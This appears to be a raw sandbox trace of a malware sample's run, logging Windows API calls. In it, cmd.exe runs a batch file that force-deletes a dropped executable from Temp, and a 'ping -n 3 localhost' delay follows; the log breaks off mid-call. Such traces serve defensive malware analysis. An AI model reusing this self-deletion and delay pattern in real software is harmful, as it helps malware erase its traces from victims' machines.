_wcsicmp (_String1="hvGO9ckx.exe", _String2=".") returned 58 [0120.826] _wcsicmp (_String1="hvGO9ckx.exe", _String2="..") returned 58 [0120.826] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0x2020 [0120.826] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0120.826] _wcsicmp (_String1="hvGO9ckx.exe", _String2=".") returned 58 [0120.826] _wcsicmp (_String1="hvGO9ckx.exe", _String2="..") returned 58 [0120.826] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0x2020 [0120.827] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe", fInfoLevelId=0x0, lpFindFileData=0x3b0554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3b0554) returned 0x390aa8 [0120.827] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 1 [0120.827] FindNextFileW (in: hFindFile=0x390aa8, lpFindFileData=0x3b0554 | out: lpFindFileData=0x3b0554) returned 0 [0120.828] GetLastError () returned 0x12 [0120.828] FindClose (in: hFindFile=0x390aa8 | out: hFindFile=0x390aa8) returned 1 [0120.828] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.828] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.829] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.829] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0120.829] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.829] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0120.829] SetConsoleInputExeNameW () returned 0x1 [0120.829] GetConsoleOutputCP () returned 0x1b5 [0120.829] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0120.829] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.829] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\sqfgqtrn.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef4ec, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0120.829] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0120.829] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.830] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0120.830] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.830] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0120.830] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef4d0, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1ef4d0*=0x3e, lpOverlapped=0x0) returned 1 [0120.830] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\n") returned 62 [0120.830] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.830] GetFileType (hFile=0x54) returned 0x1 [0120.830] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.830] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.832] _tell (_FileHandle=3) returned 145 [0120.832] _close (_FileHandle=3) returned 0 [0120.832] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef2a4 | out: _Buffer="\r\n") returned 2 [0120.832] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.832] GetFileType (hFile=0x7) returned 0x2 [0120.832] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.832] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef264 | out: lpMode=0x1ef264) returned 1 [0120.832] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.832] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef290, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ef290*=0x2) returned 1 [0120.832] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0120.832] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1ef2a0 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0120.833] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x1ef2a0 | out: _Buffer=">") returned 1 [0120.833] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.833] GetFileType (hFile=0x7) returned 0x2 [0120.833] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.833] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef268 | out: lpMode=0x1ef268) returned 1 [0120.833] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.833] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x1ef294, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x1ef294*=0x19) returned 1 [0120.833] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.833] GetFileType (hFile=0x7) returned 0x2 [0120.833] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.833] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef4ec | out: lpMode=0x1ef4ec) returned 1 [0120.834] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.834] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3af008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x1ef518, lpReserved=0x0 | out: lpBuffer=0x3af008*, lpNumberOfCharsWritten=0x1ef518*=0x3) returned 1 [0120.834] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1ef524 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" ") returned 58 [0120.834] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.834] GetFileType (hFile=0x7) returned 0x2 [0120.834] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.834] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef4e4 | out: lpMode=0x1ef4e4) returned 1 [0120.834] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.834] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x1ef510, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ef510*=0x3a) returned 1 [0120.835] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef544 | out: _Buffer="\r\n") returned 2 [0120.835] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.835] GetFileType (hFile=0x7) returned 0x2 [0120.835] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.835] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef504 | out: lpMode=0x1ef504) returned 1 [0120.835] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.835] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef530, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ef530*=0x2) returned 1 [0120.835] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0120.835] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0120.835] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0120.835] GetConsoleTitleW (in: lpConsoleTitle=0x1ef0b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.836] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee12c, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ee130, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee12c*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0120.836] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0120.836] _wcsicmp (_String1="hvGO9ckx.exe", _String2=".") returned 58 [0120.836] _wcsicmp (_String1="hvGO9ckx.exe", _String2="..") returned 58 [0120.836] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0xffffffff [0120.836] GetLastError () returned 0x2 [0120.836] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0120.836] _wcsicmp (_String1="hvGO9ckx.exe", _String2=".") returned 58 [0120.836] _wcsicmp (_String1="hvGO9ckx.exe", _String2="..") returned 58 [0120.836] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0xffffffff [0120.837] GetLastError () returned 0x2 [0120.837] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe", fInfoLevelId=0x0, lpFindFileData=0x3b0554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3b0554) returned 0xffffffff [0120.837] GetLastError () returned 0x2 [0120.837] _get_osfhandle (_FileHandle=2) returned 0xb [0120.837] GetFileType (hFile=0xb) returned 0x2 [0120.837] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0120.837] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1eeb2c | out: lpMode=0x1eeb2c) returned 1 [0120.837] _get_osfhandle (_FileHandle=2) returned 0xb [0120.837] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1eeb60 | out: lpConsoleScreenBufferInfo=0x1eeb60) returned 1 [0120.837] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0120.838] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.838] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.838] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.838] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0120.838] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.838] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0120.839] SetConsoleInputExeNameW () returned 0x1 [0120.839] GetConsoleOutputCP () returned 0x1b5 [0120.839] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0120.839] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.839] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\sqfgqtrn.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef4ec, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0120.839] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0120.839] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.839] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.839] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.840] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.840] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef4d0, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1ef4d0*=0x0, lpOverlapped=0x0) returned 1 [0120.840] GetLastError () returned 0x0 [0120.840] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.840] GetFileType (hFile=0x54) returned 0x1 [0120.840] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.840] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.840] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.840] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.840] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef4b4, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1ef4b4*=0x0, lpOverlapped=0x0) returned 1 [0120.840] GetLastError () returned 0x0 [0120.840] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.840] GetFileType (hFile=0x54) returned 0x1 [0120.840] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.840] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.840] longjmp () [0120.840] _tell (_FileHandle=3) returned 145 [0120.840] _close (_FileHandle=3) returned 0 [0120.841] CmdBatNotification () returned 0x0 [0120.841] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.841] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.841] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.841] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0120.841] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.841] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0120.841] SetConsoleInputExeNameW () returned 0x1 [0120.841] GetConsoleOutputCP () returned 0x1b5 [0120.841] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0120.841] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.842] exit (_Code=0) Process: id = "55" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16680" os_pid = "0xe34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "47" os_parent_pid = "0xdc4" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8113 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8114 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8115 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8116 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 8117 start_va = 0x240000 end_va = 0x247fff entry_point = 0x240000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 8118 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8119 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8120 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8121 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 8122 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8197 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8198 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8199 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8200 start_va = 0x230000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 8201 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 8202 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8203 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 8204 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8205 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8206 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8207 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8208 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8209 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8210 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8211 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8212 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8213 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8214 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8215 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8216 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8236 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 8237 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8238 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8239 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 8240 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 8241 start_va = 0x70000 end_va = 0x72fff entry_point = 0x70000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 8242 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 8243 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 8244 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 8245 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 8257 start_va = 0x1140000 end_va = 0x140efff entry_point = 0x1140000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8258 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 8259 start_va = 0x250000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 8260 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 8261 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 8262 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 8263 start_va = 0x1410000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 8284 start_va = 0x1510000 end_va = 0x154ffff entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 8285 start_va = 0x15f0000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x00000000015f0000" filename = "" Region: id = 8286 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 8287 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 8328 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 8329 start_va = 0x1630000 end_va = 0x182ffff entry_point = 0x0 region_type = private name = "private_0x0000000001630000" filename = "" Region: id = 8442 start_va = 0x15a0000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 8443 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 8519 start_va = 0x16e0000 end_va = 0x171ffff entry_point = 0x0 region_type = private name = "private_0x00000000016e0000" filename = "" Region: id = 8520 start_va = 0x17f0000 end_va = 0x182ffff entry_point = 0x0 region_type = private name = "private_0x00000000017f0000" filename = "" Region: id = 8521 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 87 os_tid = 0xe38 [0116.368] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfa24 | out: lpSystemTimeAsFileTime=0xcfa24*(dwLowDateTime=0x82aa7980, dwHighDateTime=0x1d440a9)) [0116.368] GetCurrentProcessId () returned 0xe34 [0116.368] GetCurrentThreadId () returned 0xe38 [0116.368] GetTickCount () returned 0x27992 [0116.368] QueryPerformanceCounter (in: lpPerformanceCount=0xcfa1c | out: lpPerformanceCount=0xcfa1c*=17315754111) returned 1 [0116.369] GetModuleHandleA (lpModuleName=0x0) returned 0x240000 [0116.369] __set_app_type (_Type=0x1) [0116.369] __p__fmode () returned 0x76b331f4 [0116.369] __p__commode () returned 0x76b331fc [0116.369] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x242ae1) returned 0x0 [0116.369] __getmainargs (in: _Argc=0x2450d4, _Argv=0x2450dc, _Env=0x2450d8, _DoWildCard=0, _StartInfo=0x2450e8 | out: _Argc=0x2450d4, _Argv=0x2450dc, _Env=0x2450d8) returned 0 [0116.369] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.380] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.381] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x245440 | out: lpWSAData=0x245440) returned 0 [0116.389] RegOpenKeyExA 